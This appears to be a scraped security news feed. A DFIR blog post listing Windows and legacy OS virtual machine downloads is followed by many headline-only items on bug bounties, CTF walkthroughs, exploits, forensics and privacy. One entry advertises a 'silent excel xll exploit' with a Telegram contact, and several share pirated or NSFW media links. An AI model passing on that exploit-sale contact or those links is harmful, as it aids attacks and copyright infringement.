    Many within the DFIR community make use of virtual systems for testing...for detonating malware, trying things within a "safe", isolated environment, etc. However, sometimes it can be tough to get hold of suitable images for creating that testing environment. I've collected a bunch of links to VirtualBox VMs for Windows, but I cannot attest to all of them actually working. But, if you'd like to try any of them, here they are... MS Edge developer virtual machines (Win7 - 10, limited time) Windows 7 Image, reports no activation needed Win95 virtual machine Various MS virtual machines (MS-DOS, Windows, etc.) Windows 11 Dev Environment (eval) Use Disk2vhd to create a virtual machine from an existing installation ReactOS - clone of Windows 5.2 (XP/2003) There's no shortage of Linux and Unix variant OS VMs available. For example, you can find Solaris VMs here. For MacOS Big Sur, you can try this site. Back in 1994 and '95, while I was in graduate school, I went to Frye's Electronics in Sunnyvale (across the street from a store called "Weird Stuff") and purchased a copy of OS/2 2.1. I did that because the box came with a $15 coupon for the impending OS/2 Warp 3.0. If you'd like to give the OS/2 Warp OS a shot, you can try this v4.52 download, or try this site for other versions of OS/2. If you're a fan of CommodoreOS, you can give this site a shot. For AmigaOS, try here, or here. How about Plan9? General Download Sites OSBoxes SysProbs VirtualBoxes Hope that helps!

  • Open

    Top 10 most rated OSINT Tools on Github
    We’re a little fed up with OSINT tools claiming they’re the best. So, we spent some time looking at some hard facts from Github. After… Continue reading on Medium »
    Officer_CIA X MaxWayld: Content Overview
    Greetings dear readers! Today I present to your attention an article written by my good friend Max — in it he made a review of more than a… Continue reading on Medium »
    The Art of Angle In GEO-OSINT Investigation
    Hey, my name is Satyam Jaiswal and in this blog, I want to share how sometimes in the OSINT investigation especially in GEO OSINT, the idea Continue reading on Medium »
    Як виявити та нейтралізувати сітку шкідливих сайтів? (кейс)
    Виявлення, комплексний аналіз і ліквідація шкідливих, спамних, фішингових сторінок, URL-адрес, посилань і сайтів. Continue reading on KR. LABORATORIES IT BLOG »
    SPY NEWS: 2022 — Week 30
    Summary of the espionage-related news stories for the Week 30 (July 24–30) of 2022. Continue reading on Medium »
  • Open

    intigriti Challenge 0722 by Vroemy
    Another awesome XSS challenge from Intigriti. Personally, I learn a lot trying to solve these monthly challenges by Intigriti. The… Continue reading on Medium »
    How to Exploit CSRF (Cross Site Request Forgery) in Web Applications — Pentester Academy Challenge
    Introduction Continue reading on Medium »
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    Vulnerabilities Scan
    Vulnerabilities Scan: 15000+PoCs; 20 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port… Continue reading on Medium »
    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    Hai Haiii, bertemu lagi nih kita. Kali ini penulis akan mencoba untuk menjelaskan mengenai sensitive data exposure dan bagaimana kita bisa… Continue reading on Medium »
    Do you need to be a programming pro to hack?
    Hacking is always presented in the media by thousands of lines of code flashing on a person’s laptop. Is this reality? Continue reading on Medium »
    Buffer Overflow: Understanding CPU Registers
    Hello Security folks, In previous article, we came to know about Stack, How Application memory works and Memory Addresses. In this article… Continue reading on Medium »
    Crocodile Starting Point HackTheBox Challenge Walkthrough.
    Crocodile is really awesome challenge by HackTheBox to practice skills related to Hacking. In today’s writeup we are going to solve this… Continue reading on Medium »
  • Open

    What is this site doing? [blackscreen]
    This site starts some service worker and seems to download/upload something just by loading what is just literally a black screen. It also created 66kb worth of cookies which I had to delete. Any insight on what it might be trying to do? This is one of the first results in google if you search for a black screen. The idea of searching for a black screen or any color is just to have a solid background for whatever reason like taking screenshots, but I think it's trying to do something fishy. submitted by /u/PlatformKnuckles [link] [comments]
    What is WMAgent?
    I found this CVE-2022-34558 which states that a WMAgent is vulnerable. I have searched the internet but I didn't understand much. submitted by /u/Chroll-On [link] [comments]
    Q: Security risk of a permanent Fritzbox-VPN connection with my parents network?
    Hello everyone, I started in the last months to educate my self more and more about privacy and cyber security. I have also started to host services and data locally. I also started to improve my network infrastructure through various services (pi-hole... etc.). Now I have also started the mission to educate my parents about this and make them aware of their digital footprint and threats. I also had the idea to use the Fritzbox VPN to connect the networks and make elements of my network infrastructure accessible to them so they do not need to build a redundant infrastructure up and maintain it. Now I would like to avoid securing myself first and then exposing myself to unmanageable/unknown risks with such a connection to my parents network. I would love to understand the risk of network wide threats better (e.g. malware that effects the whole network cross vpn ? ...) . Moreover, I cannot evaluate the security of the Fritzbox VPN (google resluts say its ok?) (Unfortunately, their Fritzbox is a bit older and will not support Wireguard). The alternative is to simply set up easy things as a pihole on a raspi that I can prepare and easily set up. But not going with the "permanent connection" solution. I would love to learn from you guys how big the risk of such network wide threats is and how you would rate the Fritzbox VPN. Thanks! submitted by /u/DonSiffo [link] [comments]
    Roadmap for getting into cyber forensics?
    I’m a junior penetration tester. Currently looking to pivot into a different area as I’m realizing that pentesting isn’t for me. My initial thought was to switch to something less technical, but before I make that change I wanted to give forensics some consideration as I’ve always thought it would be cool to explore that. I know nothing about it though so I wanted to see if there are any of y’all out there that currently work in cyber forensics and ask if A) someone switching from penetration testing would feel comfortable in a forensics role and if a pentesting background would lead to success in forensics and B) any information on how to get started. What resources to start looking at, certifications to explore, jobs to consider that would lead to a smooth transition from pentesting into forensics, etc. submitted by /u/anon2user [link] [comments]
    Lightning Port HDMI Dongle (Amazon)
    I was considering on buying an HDMI dongle from Amazon vs the original apple one to save a few bucks. I’m thinking this could contain some sort of implant but trying to understand if there is a way for me to check this before putting it on my device. Are others experienced with how to trace if this is stealing my data? submitted by /u/jeepynomad [link] [comments]
  • Open

    Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26138
    Article URL: https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/ Comments URL: https://news.ycombinator.com/item?id=32298575 Points: 1 # Comments: 0
  • Open

    数据安全技术和市场的学习
    安全企业对数据安全的认知程度还需要跟上国家的高度,加大投入,更进一步。
    攻防演习主场作战是什么样的体验?(社工+近源)
    一次梦幻的红队行动,主场作战,成果丰富。
  • Open

    SecWiki News 2022-07-31 Review
    安全知识图谱技术概述 by ourren Malware Analysis Tools 2022 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-31 Review
    安全知识图谱技术概述 by ourren Malware Analysis Tools 2022 by ourren 更多最新文章,请访问SecWiki
  • Open

    Men of The Auxiliary Division of the Royal Irish Constabulary, listed alphabetically
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    tools
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Pictures of Adventure Time show
    Highly NSFW comics https://drive.google.com/drive/mobile/folders/0B42kNriZcp4cLWlwSDlQYXdIOFE?usp=sharing&resourcekey=0-MrZHfmBcSPlHVIKzTBJIyQ submitted by /u/RainyAbrar [link] [comments]
  • Open

    How can I determine whether artefacts in Safari are local or synced?
    If they are synced artefacts - what device identifier is available? submitted by /u/zoomjua [link] [comments]
    Digital Forensic Introduction Video
    In this video, I have covered the following content: 1) What is Cyber Crime? 2) What are the different types of cybercrime? 3) Forensics Investigation Procedure 4) Effective Strategy for CISOs for Forensics Requirements 5) Top tools 6) Good Evidence Principles 7) What is "Chain of Custody?" ​ https://www.youtube.com/watch?v=u2zgEFm5RHQ submitted by /u/prabhnair1 [link] [comments]
  • Open

    EDR Blindness, pt II
    As a follow-on to my earlier blog post, I've seen a few more posts and comments regarding EDR 'bypass' and blinding/avoiding EDR tools, and to be honest, my earlier post stands. However, I wanted to add some additional thoughts...for example, when considering EDR, consider the technology, product, and service in light of not just the threat landscape, but also the other telemetry you have available.  This uberAgent article was very interesting, in particular the following statement: “DLL sideloading attack is the most successful attack as most EDRs fail to detect, let alone block it.” The simple fact is, EDR wasn't designed to detect DLL side loading, so this is tantamount to saying, "hey, I just purchased this brand new car, and it doesn't fly, nor does it drive underwater...".  Joe Stock…
  • Open

    Weekend Wrap-up of Infosec News
    submitted by /u/SuaveHobo [link] [comments]
    CQ, a code security scanner
    submitted by /u/0xdea [link] [comments]
  • Open

    Open S3 Bucket Accessible by any Aws User
    GoCD disclosed a bug submitted by khalidou: https://hackerone.com/reports/1654145
  • Open

    HackTheBox — Meow
    Meow is boot2root CTF on HackTheBox. It has the difficulty “very easy” and is part of the Tier 0 starting point machines. Continue reading on Medium »
  • Open

    Silent excel xll exploit - telegram : mave12x
    submitted by /u/SarahEliset [link] [comments]

  • Open

    Abwaab Data Leak
    Over 2,26 #million users #data leaked from Abwaab Jordan Platform, Continue reading on Medium »
    Zero-day XSS
    Hello Cyber Security Enthusiast. I’m back again with another article of XSS. In this article, I’ll explain how I got an unexpected XSS and… Continue reading on InfoSec Write-ups »
    How I Earned €150 in 2 Minutes | HTML injection in email
    Introduction : Continue reading on Medium »
    Authentication Bypass
    Hello folks, Continue reading on Medium »
    Cross-function re-entrancy in the wild
    After many catastrophic, tragic incidents in the past, I believe that every one would have heard about this so-called “re-entrancy” attack… Continue reading on Medium »
    Sequel Starting Point HackTheBox Challenge Tier 1 WriteUp
    Sequel is a really nice challenge by HacktheBox to Practice Hacking skills. So in this writeup we are going to dive into it. Continue reading on Medium »
  • Open

    Pokemon-Shellcode-Loader: Tired of looking at hex all day and popping '\x41's? Rather look at Lugia/Charmander? I have the solution for you.
    submitted by /u/Techryptic [link] [comments]
    Running Exploit As Protected Process Ligh From Userland
    submitted by /u/tasty-pepperoni [link] [comments]
    CVE-2022-36123 - Linux kernel <5.18.13 lacks a certain clear operation for the block starting symbol (.bss). This allows Xen PV guest OS users to cause a denial of service, or gain privileges.
    submitted by /u/docker-osx [link] [comments]
  • Open

    Running Exploit As Protected Process Ligh From Userland
    A tool, called RunAsWinTcb, uses a userland exploit to run a DLL with the protection of Protected Process Light(WinTcb-Ligh signer type) Blog about the vulnerability and tool: https://tastypepperoni.medium.com/running-exploit-as-protected-process-ligh-from-userland-f4c7dfe63387 The tool: https://github.com/tastypepperoni/RunAsWinTcb submitted by /u/tasty-pepperoni [link] [comments]
    Pokémon Shellcode Loader
    submitted by /u/Techryptic [link] [comments]
  • Open

    A Newbie need some help with patch analysis
    Hi There, A year ago i started my career in App Sec as a penetration tester. But what i want to learn now is the patch analysis.Basically when a CVE gets released the vendor releases a patch.But the issue I am facing is finding the patch it self.Yes GitHub is the right place to looking but there are so many commits out there , how do you identify the right commit to analyse the patch so that you can develop your own exploit or may be find a bypass Any help is Appreciated. submitted by /u/wh0am1root [link] [comments]
  • Open

    x-ways editing event log definition file.
    Question for anyone that uses X-ways. I am trying to edit the exvt definition file that parses out windows events on x-ways. I want to add some other events to it. However, when I edit the text document that holds the information for it and saved it after, there is no change. I even tried to process the case again no change. Anyone have any ideas on this. submitted by /u/divinealpha12 [link] [comments]
    Transition from Government to Private Sector
    I am looking to transition to private sector after 8 years of digital forensics in a law enforcement capacity. Are there any hiring managers out there that can give advice on what you look for or possibly provide resume critique? submitted by /u/outdorksman [link] [comments]
  • Open

    Arris / Arris-variant DSL/Fiber router critical vulnerability exposure
    Article URL: https://derekabdine.com/blog/2022-arris-advisory.html Comments URL: https://news.ycombinator.com/item?id=32288020 Points: 77 # Comments: 22
  • Open

    SecWiki News 2022-07-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    HacktheBox [Late]
    Full Nmap TCP scan shows port 80 and 22 open: Continue reading on Medium »
    RED TEAM ASSESSMENT SERVICE IN DELHI
    Definition Continue reading on Medium »
  • Open

    Corsa Site Scripting Vulnerability (XSS)
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1650210
    Open redirection at https://smartreports.mtncameroon.net
    MTN Group disclosed a bug submitted by vulnera: https://hackerone.com/reports/1530396
  • Open

    To the pentesters, what's in your kit bag?
    Found the same thread from 8 years ago and am wondering about new answers and the current kit. So to the pentesters, what do you carrry in your bag for pentests at the customers location? submitted by /u/namelessOnReddit_ [link] [comments]
    Is this attack possible or just a scare tactic ?
    I was browsing regarding vpns and a website said this, "Even when you are using a VPN it is possible to find out who you are by looking at your Hostname, Computer name or MAC address by those on the web or local network. If you're for example using torrents it is possible to see your Computer ID. If someone really wants to find out who you are, they can by creating a simple algorithm to track your Computer ID patterns in torrent networks. Same method can be applied to all types of networks." Is this true or just a scare tactic ? submitted by /u/zilla005 [link] [comments]
    SANS MSISE - employment waiver
    Personal background: Active duty Navy aviation electronics technician. Four years remaining on my contract. Currently on track to finish B.S. in cybersecurity in Spring 2023. I've started looking into graduate programs; namely at my current institution but also the SANS Information Security Engineering program. I've heard varying opinions on the ROI of a masters degree; but between my Navy tuition assistance and GI-Bill, I could have the program funded. Not to mention the certifications that the program would lead to. All that said, I'm wondering if anyone has experience with getting the graduate admissions employment requirement waived. As an aviation electronics technician I work with computers and classified material; mostly aircraft systems, classified computer systems, COMSEC, etc. With that in mind, I'm not certain I would be able to apply all the concepts directly. Would mentioning a home lab setup bolster my chances? submitted by /u/SlipshodRaven [link] [comments]
  • Open

    GSuite domain takeover through delegation
    No content preview
  • Open

    GSuite domain takeover through delegation
    No content preview
  • Open

    GSuite domain takeover through delegation
    No content preview
  • Open

    越南数据合规重点解读
    越南对数字经济的重视可见一斑,数据合规作为数字经济的核心合规需求,值得各出海越南企业的重视。
  • Open

    Officer_CIA: Retrospective
    Here is a retrospective of my best articles! You can also track my work entirely at my start.me (always use mullvad.net when visiting it)… Continue reading on Medium »

  • Open

    Persistence Using Windows Terminal “Profiles”
    Profiles All The Way Down Continue reading on Medium »
  • Open

    Possible to make restricted files public on Phabricator via Diffusion
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1560717 - Bounty: $2000
    Send Fax from Anyone's HelloFax Account Due to Misconfigured Email Validation
    Dropbox disclosed a bug submitted by sayaanalam: https://hackerone.com/reports/1428385 - Bounty: $4913
    @nextcloud/logger NPM package brings vulnerable ansi-regex version
    Nextcloud disclosed a bug submitted by ro0telqayser: https://hackerone.com/reports/1607601
  • Open

    IDOR pada NFT Marketplace naksh.org
    Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied… Continue reading on Medium »
    Business Logic Vulnerabilities == $$$
    According to OWASP , Business Logic Vulnerabilities are ways of using the legitimate processing flow of an application in a way that… Continue reading on Medium »
    5 easy ways to detect the clickjacking vulnerability
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India. Continue reading on Medium »
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    Complex libraries lead to hidden attack vectors Continue reading on InfoSec Write-ups »
    EAZI FINANCE TESTNET QUICK GUIDE
    ABOUT EAZI FINANCE Continue reading on Medium »
    ASN — Autonomous System Networks
    some` some` Continue reading on Medium »
    Hakrawler — information gathering tool for bug bounty hunters
    In this tutorial, Im just wanna talk about another hacking tool which developed for penetration testers and specially bug bounty hunters. Continue reading on Medium »
    Hacking the photographer
    Hi guys! Guess who’s back…back again! This blog will be great I could teach you a lot of things, this time to show you how I rooted the… Continue reading on Medium »
    Networking Fundamentals — for Ethical Hacking & Bug Hunting (day-3)
    Hello guys, it’s Selim back here with another interesting article. In the previous article, we learn about how and why a beginner should… Continue reading on Medium »
    Appointment Starting Point HackTheBox Writeup.
    Appointment is a very good lab to practice for Databases related security isssues. So in this writeup[walkthrough] we are going to exploit… Continue reading on Medium »
  • Open

    google home page
    Hello, I don't know if it is normal or not? But instead of being google.com, my Google home page looks like this: google.com/webhp?client=ms etc Is this normal or not? submitted by /u/nintenboye [link] [comments]
    Autoupdate Weak Passwords
    Is there a service that will allow me to import all of my usernames and passwords, then simply click a button and it will go and automatically strengthen all of my weak passwords on each of the sites where my security is lacking? submitted by /u/thats_taken_also [link] [comments]
    Bruteforce admin account on DC from unknown device
    In the DC logs, I found that there were 5,000+ failed logon attempts from an unknown device (that definaly is not part of us) to one of our admin account. How would you start an investigation? What I did: I checked the VPN logs. Maybe someone login to our corporate network via VPN, but nothing found. I aslo have a hypotesis, that maybe attaker not connected to internal network, there is some external services that are using AD creds to authenfication. So, the attack was from external to internal. But, I don't know how to check this. submitted by /u/athanielx [link] [comments]
    How does an app like “Flightradar24” know that I have gotten to an airport/a location.
    When I arrive at an airport I get a notification from the flight radar app on my iPhone that welcomes me to the airport (here’s a screen shot: https://postimg.cc/n91HvFS9) I just don’t understand how does the app know that even though it is running in the background and has only while using turned on in the location settings. Of course my #1 worry is privacy like does that mean it is constantly grabbing my location just to display me that notification once in a while when I goto the airport and #2 how does this impact battery life. If the app can descretly in the background get my location, can other apps do this? And how would I turn that off, I really don’t need Facebook or TikTok knowing where I am. (If the answer is obvious don’t absolutely roast me please lol) submitted by /u/SmallIce4 [link] [comments]
    Password manager for life
    Hi I am currently looking to get a password manager to install on my computer and that I'd keep for countless years I don't mind paying a price (small per month) or big upfront But I have a questions about servicves like bitwarden with a monthly subscription. If the company fails or somthing along those line How would the system still work ? I prefer an upfront payment anyway but the monthly payment for things such as these as always been bugging me Looking forward to your answers! submitted by /u/Simon__Puech [link] [comments]
    Information Security Compliance Jobs
    Hello, I didn’t know where to post this so I’m asking here as this subreddit seemed relevant. I’m an IS and IT compliance professional in Pakistan and have been working in the domain for the past six years mainly at consulting firms (Deloitte and KPMG) in Pakistan. I’ve recently switched to an insurance company in my country as an Information Security Manager but our country has been doing really badly economically which is the reason I’ve been looking into remote jobs that could potentially pay in USD or any other foreign currency. I always planned on moving abroad to pursue a career but that isn’t possible right because of my family which is why I’m inquiring about where I can find remote jobs for the domain. PS sorry if I made mistakes typing this as I’m on my phone and English isn’t my first language. submitted by /u/ads496 [link] [comments]
  • Open

    I'm Building a Self-Destructing USB Drive.
    submitted by /u/Machinehum [link] [comments]
    Critical Vulnerability Affecting Arris / Arris-variant DSL/Fiber Routers
    submitted by /u/sanitybit [link] [comments]
    ImHex - A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM
    submitted by /u/CyberMasterV [link] [comments]
    Manipulating Windows Tokens with Go
    submitted by /u/sciencestudent99 [link] [comments]
    Disclosing information with a side-channel in Django
    submitted by /u/albinowax [link] [comments]
  • Open

    South Park episodes in Fullscreen (4:3)
    SP 4:3 In this folder are the first 11 and 1/2 seasons of South Park in 4:3 Fullscreen before they were rerendered in 16:9 widescreen. The second half of season 12 is not included, as those episodes were actually originally produced in widescreen, but cropped into fullscreen for early TV airings and DVD releases. As of now, episodes are still being added, so if you notice that a season or episode is not included, don't worry, it'll all be there within the next couple of days. I don't have all of seasons 9 and 10 yet, so they may take an extra day or so. Edit: From the looks of it, I won’t be able to get season 10. If I find them, this post will be updated. submitted by /u/ImagineDraggin9 [link] [comments]
  • Open

    OSINT Tool — Emporis
    I heard about the website Emporis.com while on holiday reading the book “A Burglars Guide to the City” by Geoff Manaugh. I just want to… Continue reading on Medium »
    War in Ukraine / July 28
    Day 156: The tragedy in Olenivka Continue reading on Medium »
    Leaks: find and stop
    I was prompted to this topic by numerous publications of leaks of confidential information from internal databases of state bodies, which… Continue reading on Medium »
  • Open

    SecWiki News 2022-07-29 Review
    EMBA - The firmware security analyzer by ourren VulnLab: Web Application Vulnerabilities Lab by ourren Vajra - Your Weapon To Cloud by ourren APT trends report Q2 2022 by ourren [HTB] October Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-29 Review
    EMBA - The firmware security analyzer by ourren VulnLab: Web Application Vulnerabilities Lab by ourren Vajra - Your Weapon To Cloud by ourren APT trends report Q2 2022 by ourren [HTB] October Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Clean definition of physical vs. logical data extraction?
    Hi there, it seems to me, that it's not that easy to very precisely define the difference between physical and logical data extraction. I tried something like: "physical data extraction means copying the data bitwise from the source whereas logical extraction involves some kind of interpretation of the data with any software." But it doesn't feel like it's all. Do you see my problem? submitted by /u/Knuust [link] [comments]
    Encase won't open HFS+ Hard Drive
    Hi everyone We have got to very similar hard drives with nearly the same problem. The hard drives are external usb disks with both HFS+ Case sensitive, not Journaled Filesystem. When we try to open them in Encase 21 oder 22 we get the error message "string or blob too long" We are currently trying to figure out of any of the files oder folders a corrupt by exporting them with GetData Forensic explorer, because this Tool can open the hard drives but gets problem with exporting all of the files. Did anyone had have this error message in encase and can tell me where or whats the problem is? submitted by /u/Ready_Note6642 [link] [comments]
    What weapons of choice are in you're forensics workstation software repertoire? Post your builds!
    I've just upgraded my workstation and bought an absolute beast of a laptop - I've begun the process of listing all my programs, apps, software, keys and tools and other useful bits and pieces that I have gathered over time on my main workstation PC and I am using the opportunity of a fresh new rebuild on the upgraded workstation and the beast of a laptop to tidy everything up and really streamline the whole setup with the new hardware. My programs and apps are mostly geared towards mobile forensics, and are as follows: ​ iPhone Backup Extractor Oxygen Forensic Detective Oxygen Data Extraxtion Wizard Oxygen Forensic Call Data Exert Oxygen Forensic Cloud Extractor Axiom Process Axiom Examine Autopsy (+ modules) iPhone Backup Extractor iMazing RazorSQL Sqlite DB Browser SQL Database Recovery Sqlite Forensic Explorer DCode Timestamp Converter FTK Forensic Toolkit Notepad++ HEX Editor (various programs) DrFone (Android and Ios) Stella Data Recovery Stella iPhone Recovery Stella OST Converter VLC Media Player + Codec Packs Most of the Nirsoft tools (some nifty little things there!) ​ .... Can anyone think of anything super useful that I haven't got? Mostly mobile forensics related stuff as you can see, that's my main area of interest - but there's a few broad covers there too ;) What do you consider the essential tools, programs and software that you have on your workstation? submitted by /u/dothepropellor [link] [comments]
  • Open

    Threat Hunting Techniques, Tactics and Methodologies
    submitted by /u/Successful_Mix_8988 [link] [comments]
    Red Team Field Manual V2 by Ben Clark and Nick Downer has been released
    submitted by /u/ulriken_ [link] [comments]
  • Open

    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    No content preview
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    No content preview
  • Open

    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    No content preview
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    No content preview
  • Open

    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    No content preview
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    No content preview
  • Open

    FreeBuf早报 | 美国法院系统遭受重大攻击;乌克兰网络高官就俄乌网络战发表看法
    美国法院系统遭受重大攻击,密封文件面临风险;西班牙一核安全系统遭黑客攻击,部分地区服务中断数月。
    FreeBuf周报 | 51款应用遭上海通信管理局通报;大数据杀熟将遭严惩;美国与英国达成数据互通协议;Web3经济损失达历史新高
    各位Buffer周末好,以下是本周「FreeBuf周报」。
    Domino服务器SSL证书安装指南
    Domino服务器SSL证书安装指南。
    企业外包的安全风险及应对策略 | FreeBuf甲方群话题讨论
    在安全环节,外包往往会成为薄弱的一环。外包团队究竟会为企业带来哪些安全风险?我们又该如何应对外包所带来的问题?
    美预计将扩大与乌克兰的网络安全伙伴关系
    美国政府的网络安全机构已与其乌克兰网络安全机构签署了一项关于在网络安全方面加强合作的协议。
    暨南大学信息技术研究所招聘网络安全技术人员计划
    暨南大学信息技术研究所招聘网络安全服务项目经理、网络技术支持工程师、网络安全工程师(攻防对抗方向)等
    微软称发现奥地利间谍团伙,利用Windows和Adobe 0day攻击欧洲组织
    微软安全和威胁情报团队称发现一家奥地利公司销售间谍软件DSIRF,该软件是基于未知的Windows漏洞开发。
    谷歌禁用第三方Cookies计划再次推迟
    谷歌在本周周三表示,它再次将暂缓禁用Chrome网络浏览器中的第三方cookies的计划。
    越来越多受害者拒绝向黑客支付赎金
    受害者向黑客支付赎金的比例和赎金数额正在下降,这一趋势自 2021 年第四季度以来一直在持续。
    微软 SQL 服务器被黑,带宽遭到破坏
    攻击者通过使用捆绑广告的软件甚至是恶意软件入侵微软的SQL服务器,将设备转化为在线代理服务出租的服务器进行牟利。

  • Open

    Domain Enumeration Methodology
    Hey folks, today I start a new series of articles to discuss Active Directory Exploitation. This is the first article, we focus on domain… Continue reading on Medium »
    Sticky Notes is it safe?
    What if i told you it’s better to forget your password than write it down into a sticky note. Continue reading on Medium »
    Linux privilege escalation by abusing sudo
    In Linux, sudo stands for “super user do”. Whenever you execute a command in Linux and prefix it with sudo, it is executed with root… Continue reading on Medium »
  • Open

    HTML Injection via TikTok Ads Email Share
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1376990 - Bounty: $1000
    Twitter Account hijack through broken link in https://runpanther.io
    Panther Labs disclosed a bug submitted by prakash142: https://hackerone.com/reports/1607429 - Bounty: $100
    Hijack all emails sent to any domain that uses Cloudflare Email Forwarding
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1419341 - Bounty: $6000
    Acronis True Image Local Privilege Escalation Due To Race Condition In Application Verification
    Acronis disclosed a bug submitted by vkas-afk: https://hackerone.com/reports/1251464 - Bounty: $250
    Off-by-slash vulnerability in nodejs.org and iojs.org
    Internet Bug Bounty disclosed a bug submitted by nagaro: https://hackerone.com/reports/1650273 - Bounty: $1200
  • Open

    nanopb Protobuf Decompiler - Anvil Secure
    submitted by /u/anvilventures [link] [comments]
    Building AppSec Pipeline for Continuous Visibility
    submitted by /u/nicksthehacker_ [link] [comments]
    Extracting Ghidra Decompiler Output with Python
    submitted by /u/dinobyt3s [link] [comments]
    Railway cybersecurity in the era of interconnected systems
    submitted by /u/sanitybit [link] [comments]
    Vulnerable by Design: Azure Red Team Attack and Detect Workshop
    submitted by /u/sanitybit [link] [comments]
    Abusing Duo Authentication Misconfigurations in Windows and Active Directory Environments
    submitted by /u/sanitybit [link] [comments]
    Spear Phishing on Modern Platforms
    submitted by /u/sanitybit [link] [comments]
    Passkeys: a push to take WebAuthn to the masses
    submitted by /u/sanitybit [link] [comments]
    Scraping Login Credentials With XSS
    submitted by /u/sanitybit [link] [comments]
  • Open

    Reading Message from Microsoft’s Private Yammer Group
    Hi All, Continue reading on Medium »
    Weak Session IDs (Low - Security) | DVWA Writeup
    Session hijacking is a good place to start career in bug bounty. This walkthrough will assist you in mastering a knowledge and skills. Continue reading on Medium »
    XSS in Open Redirect which uses attribute rel=”noopener follow” target=”_blank Via Browser Modern
    Hi everyone Continue reading on Medium »
    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    Hey 👋 Continue reading on Medium »
    How I became a millionaire in 3h | Fintech Bug Bounty — Part 1
    Lately, I’ve been doing some pentesting on a bank. It’s not like they hired me, but I felt curious about their infrastructure and asked… Continue reading on Medium »
    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    Moral of the story — be careful when you refactor code Continue reading on InfoSec Write-ups »
    Write Up Bug pada Aplikasi UIN Maulana Malik Ibrahim
    Kali ini saya akan menceritakan pengalaman saya tentang Bug yang saya temukan pada aplikasi UIN Maulana Malik Ibrahim Malang. Continue reading on Medium »
    GALAXYBLITZ BETA CAMPAIGN $100,000 TO BE SHARE
    Galaxy Blitz is a Play To Earn strategy NFT game where you lead the descendants of humanity to forge a new empire. Continue reading on Medium »
  • Open

    Nothing new or spectacular just having some fun. Golang redteaming.
    submitted by /u/allbetsroffnow [link] [comments]
  • Open

    dotnetfile Open Source Python Library: Parsing .NET PE Files Has Never Been Easier
    The dotnetfile library extracts useful information from .NET PE files and can overcome common techniques malware authors use to break parsing. The post dotnetfile Open Source Python Library: Parsing .NET PE Files Has Never Been Easier appeared first on Unit 42.
  • Open

    Windows and Linux Authentication Bypass with new version of AIM (+ virtual DD)
    submitted by /u/DFIRScience [link] [comments]
    How long does it take cellebrite to get back with a quote?
    I am doing a lab refresh and have contacted cellebrite for a quote, I had a call with them, then never heard back. It's has been over a week. Is this normal? Also if you were doing a lab refresh, what would be your dream setup? submitted by /u/MDCDF [link] [comments]
    SANS FOR585 index?
    Does anyone have a SANS FOR585 index that I could see? I'm curious whether mine is adequate. submitted by /u/tankton [link] [comments]
    Android 12 / Verizon / sms recovery
    Corporate investigation, not criminal. Sent phone away, forensic company sent it back saying they couldn’t do anything with it. So I said might as well take a stab at it. Using MobilEdit for recovery since I know very little about android. Pull a logical dump of the phone, get everything off the phone but nothing shows up in its deleted data scan. Take Samsung Smart Switch Backup to PC, save for later. Pursue xda forums, find that the phones bootloader is not unlockable, so no root access for me. Thanks Verizon. Boot to tsurgi, use android triage, but nothing helpful there. See that mobiledit can import a smart switch backup, try to import the one I took earlier, but it can’t read it, can only read backups to SD card. Ok then, go get a microSD card and usb-c connector, attach it…an…
    Trying to recover Messenger Conversation
    I already tried downloading Personal Data multiple times. Its not there. The chats were 3 weeks ago at most. Any tips? submitted by /u/SaqMadique [link] [comments]
  • Open

    Currently working workers.dev sites
    https://xp3.xev.workers.dev https://drive.spidercloud.workers.dev/1:/ https://cloud.eleventh-hour.workers.dev/0:/ https://www.savage69.workers.dev/0:/ https://otmbd01.sasohan.workers.dev https://td.lightdrive.workers.dev/1:/ https://mydrive.rahul112kapoor.workers.dev/0:/ https://netflixcrew.rahulinstinct.workers.dev/0:/ https://punishermirror.punisher876.workers.dev/0:// https://animated0.archives.workers.dev/ https://ps4.td-index.workers.dev/0:/ https://sparkling-sea-1d6d.bakingsoda.workers.dev ​ (The first one is mine) Pastebin submitted by /u/ilikemacsalot [link] [comments]
    D&D Books
    http://www.dnd.etherealspheres.com/eBooks/ A couple NSFW books submitted by /u/c-rn [link] [comments]
  • Open

    Looking for someone to do vulnerability research and develop exploits together.
